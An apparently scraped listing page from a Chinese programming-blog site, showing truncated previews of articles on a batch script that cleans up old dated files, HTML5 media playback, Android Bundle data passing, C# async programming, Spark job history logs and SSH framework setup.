    @echo off ::演示:删除指定路径下指定天数之前(以文件名中包含的日期字符串为准)的文件。 ::如果演示结果无误,把del前面的echo去掉,即可实现真正删除。 ::本例假设文件名中包含的日期字符串(比如:bak-2009-12-25.log) rem 指定待删除文件的存放路径 set SrcDir=C:/Test/BatHome rem 指定天数 set DaysAgo=1
  • 跨浏览器兼容的HTML5视频音频播放器 天梯梦 html5
    HTML5的video和audio标签是用来在网页中加入视频和音频的标签,在支持html5的浏览器中不需要预先加载Adobe Flash浏览器插件就能轻松快速的播放视频和音频文件。而html5media.js可以在不支持html5的浏览器上使video和audio标签生效。   How to enable <video> and <audio> tags in
  • Bundle自定义数据传递 hm4123660 androidSerializable自定义数据传递BundleParcelable
          我们都知道Bundle可能过put****()方法添加各种基本类型的数据,Intent也可以通过putExtras(Bundle)将数据添加进去,然后通过startActivity()跳到下一下Activity的时候就把数据也传到下一个Activity了。如传递一个字符串到下一个Activity   把数据放到Intent
  • C#:异步编程和线程的使用(.NET 4.5 ) powertoolsteam .net线程C#异步编程
    异步编程和线程处理是并发或并行编程非常重要的功能特征。为了实现异步编程,可使用线程也可以不用。将异步与线程同时讲,将有助于我们更好的理解它们的特征。 本文中涉及关键知识点 1. 异步编程 2. 线程的使用 3. 基于任务的异步模式 4. 并行编程 5. 总结 异步编程 什么是异步操作?异步操作是指某些操作能够独立运行,不依赖主流程或主其他处理流程。通常情况下,C#程序
  • spark 查看 job history 日志 Stark_Summer 日志sparkhistoryjob
    SPARK_HOME/conf 下: spark-defaults.conf 增加如下内容 spark.eventLog.enabled true spark.eventLog.dir hdfs://master:8020/var/log/spark spark.eventLog.compress true spark-env.sh 增加如下内容 export SP
  • SSH框架搭建 wangxiukai2015eye springHibernatestruts
    MyEclipse搭建SSH框架 Struts Spring Hibernate 1、new一个web project。 2、右键项目,为项目添加Struts支持。    选择Struts2 Core Libraries -<MyEclipes-Library>      点击Finish。src目录下多了struts
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他